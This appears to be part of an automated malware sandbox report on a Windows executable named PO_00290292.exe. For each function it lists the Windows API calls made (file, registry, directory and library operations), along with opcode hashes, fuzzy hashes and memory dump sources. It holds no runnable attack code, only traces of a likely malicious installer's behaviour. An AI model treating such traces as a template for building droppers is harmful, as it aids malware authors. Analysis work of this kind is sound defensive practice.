                                                                  • Instruction Fuzzy Hash: FCF03171A14204EBEB209F65DE8CABF767DEF80354B10843FF505B61D0DAB84D419B69
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  APIs
                                                                    • Part of subcall function 00405D2E: GetFileAttributesW.KERNELBASE(?,?,00405933,?,?,00000000,00405B09,?,?,?,?), ref: 00405D33
                                                                    • Part of subcall function 00405D2E: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405D47
                                                                  • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405B09), ref: 00405942
                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000000,00405B09), ref: 0040594A
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405962
                                                                  Similarity
                                                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                                                  • String ID:
                                                                  • API String ID: 1655745494-0
                                                                  • Opcode ID: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
                                                                  • Instruction ID: ecea3d8082f0941e5ee01c5501cf82e541f4c7e763f85e657b920a2cf98d934c
                                                                  • Opcode Fuzzy Hash: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
                                                                  • Instruction Fuzzy Hash: 6EE09B72105A91D6D21067349E0CB5F2AD8DF96335F09493EF595F11D0C778880ACA7D
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  APIs
                                                                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3677997916-0
                                                                  • Opcode ID: f2a8e28ff262e398c83ec6795697b3da2d976eaa4e9bfe855c751e768ecc29ae
                                                                  • Instruction ID: a4ed2935f8c713a64b441f8b02302a8faa8aa65f3841d01997d269d515fb9b23
                                                                  • Opcode Fuzzy Hash: f2a8e28ff262e398c83ec6795697b3da2d976eaa4e9bfe855c751e768ecc29ae
                                                                  • Instruction Fuzzy Hash: 9D119131911205EBDB10CFA0CA489AEB7B4EF44354B20843FE446B72D0D6B85A41DB19
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                                  • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
                                                                  • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                                  • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  APIs
                                                                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                  Similarity
                                                                  • API ID: CloseDeleteOpenValue
                                                                  • String ID:
                                                                  • API String ID: 849931509-0
                                                                  • Opcode ID: 2137f07228e7049a48c43a80b617cac71fc03f597c3c39b68645fbf02ee1db44
                                                                  • Instruction ID: b5033fe3495a5d5fbf66e52db86fe43622c16bf705f2fe0f4142c4154f9543e6
                                                                  • Opcode Fuzzy Hash: 2137f07228e7049a48c43a80b617cac71fc03f597c3c39b68645fbf02ee1db44
                                                                  • Instruction Fuzzy Hash: 45F04F32A04110ABEB11BFB59B4EABE726A9B40314F15807BF501B71D5D9FC99025629
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 004053C0
                                                                    • Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 0040540C
                                                                  Similarity
                                                                  • API ID: InitializeMessageSendUninitialize
                                                                  • String ID:
                                                                  • API String ID: 2896919175-0
                                                                  • Opcode ID: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
                                                                  • Instruction ID: fd15c1a48ffcd0bde852b119af7687a848e5b357f1d71b2c4b4b2b4c4c2fcb19
                                                                  • Opcode Fuzzy Hash: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
                                                                  • Instruction Fuzzy Hash: 55F0F076645601CBD3101B54AD05B5B7268EF80781F56407EEE44A23F1CABA48428B2E
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  • Opcode ID: 4f5d9ef0beddd45689b81fa3b2d2ac104db1f3844eed1b1a0e4dc60d6ad0a3f0
                                                                  • Instruction ID: 3d140fe00ea388f21a06c6326494b10f153b64dd8f5dad9855b01bbfc98b082c
                                                                  • Opcode Fuzzy Hash: 4f5d9ef0beddd45689b81fa3b2d2ac104db1f3844eed1b1a0e4dc60d6ad0a3f0
                                                                  • Instruction Fuzzy Hash: 65E04876B00104DBCB24CBA4ED808AD77A6AB44310750497BD501B3660C675DC51CF28
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                                    • Part of subcall function 004064E8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
                                                                    • Part of subcall function 004064E8: wsprintfW.USER32 ref: 0040653A
                                                                    • Part of subcall function 004064E8: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040654E
                                                                  Similarity
                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2547128583-0
                                                                  • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                                  • Instruction ID: 8c1a5bb66f910ccc430fc34c4425cef617f316e2833151c7c1ff8c8a0ee84b40
                                                                  • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                                  • Instruction Fuzzy Hash: C3E086326042206BD6105B706E0893762BC9ED8740302483EF946F2084D778DC329A6D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\PO_00290292.exe,80000000,00000003), ref: 00405D57
                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                  • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                                  • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                  • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,?,00405933,?,?,00000000,00405B09,?,?,?,?), ref: 00405D33
                                                                  • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405D47
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                  • Instruction ID: 62c1218995ad43f24aa052634507c0d83541fa9dca801c4eab67991220ff17ac
                                                                  • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                  • Instruction Fuzzy Hash: 40D01272504520AFC2513738EF0C89BBF95EB543B17028B35FAF9A22F0DB304C568A98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040582F
                                                                  • GetLastError.KERNEL32 ref: 0040583D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                  • Instruction ID: d963a2520b22da8993c1f0374a54a6368e12bf2bf52e26206a68f99a8800bbf8
                                                                  • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                  • Instruction Fuzzy Hash: 1DC04C31204B029AD7506B609F097177954AB50781F11C8396946E00A0DE348465DE2D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FileMove
                                                                  • String ID:
                                                                  • API String ID: 3562171763-0
                                                                  • Opcode ID: a51ebfd131b5ce1ad24a1fd58dead1362408043bc730019d15f3e82182553067
                                                                  • Instruction ID: f96437beda5fd31dd1875ddb5f908f1f3267c620ccf54a3d4895ce3c899c2c08
                                                                  • Opcode Fuzzy Hash: a51ebfd131b5ce1ad24a1fd58dead1362408043bc730019d15f3e82182553067
                                                                  • Instruction Fuzzy Hash: 50F0B431604114D7CB20BF7A4F0DD5E32A59F82338B25437BF912B62E6DAFC8A41956E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWrite
                                                                  • String ID:
                                                                  • API String ID: 390214022-0
                                                                  • Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                  • Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
                                                                  • Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                  • Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: PathSearch
                                                                  • String ID:
                                                                  • API String ID: 2203818243-0
                                                                  • Opcode ID: 0ce7f8cd7b3dd26209cda17540e289f7ec9c7824dd55c0017d6758264515c3ca
                                                                  • Instruction ID: 9d0666dde0d895d2acfda9375e79d31dc3107899110506874ca2c1483bba1856
                                                                  • Opcode Fuzzy Hash: 0ce7f8cd7b3dd26209cda17540e289f7ec9c7824dd55c0017d6758264515c3ca
                                                                  • Instruction Fuzzy Hash: 2DE08676300100EBD750CFA4DE49AAA77ADDF40378F20417BF615E61D1E6B49A41973D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040E2AE,0040CED0,004032EF,0040CED0,0040E2AE,00414ED0,00004000,?,00000000,00403119,00000004), ref: 00405E19
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                  • Instruction ID: dac0b8971ba2920abb5474f128329a0fa477ab7403896bbfc0984bb8014ca22f
                                                                  • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                  • Instruction Fuzzy Hash: 4AE08632100119ABCF105F50DC00EEB376CEB00350F004832FA65E2040E230EA219BE4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                   Uniqueness
                                                                   • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040336B,0040A230,0040A230,0040326F,00414ED0,00004000,?,00000000,00403119), ref: 00405DEA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                   Uniqueness
                                                                   • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileString
                                                                  • String ID:
                                                                  • API String ID: 1096422788-0
                                                                   Uniqueness
                                                                   • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                   Uniqueness
                                                                   • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                   Uniqueness
                                                                   • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                   Uniqueness
                                                                   • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • SendMessageW.USER32(00000028,?,00000001,004040A3), ref: 00404285
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                   Uniqueness
                                                                   • Uniqueness Score: -1.00%
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,0040403C), ref: 0040426E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
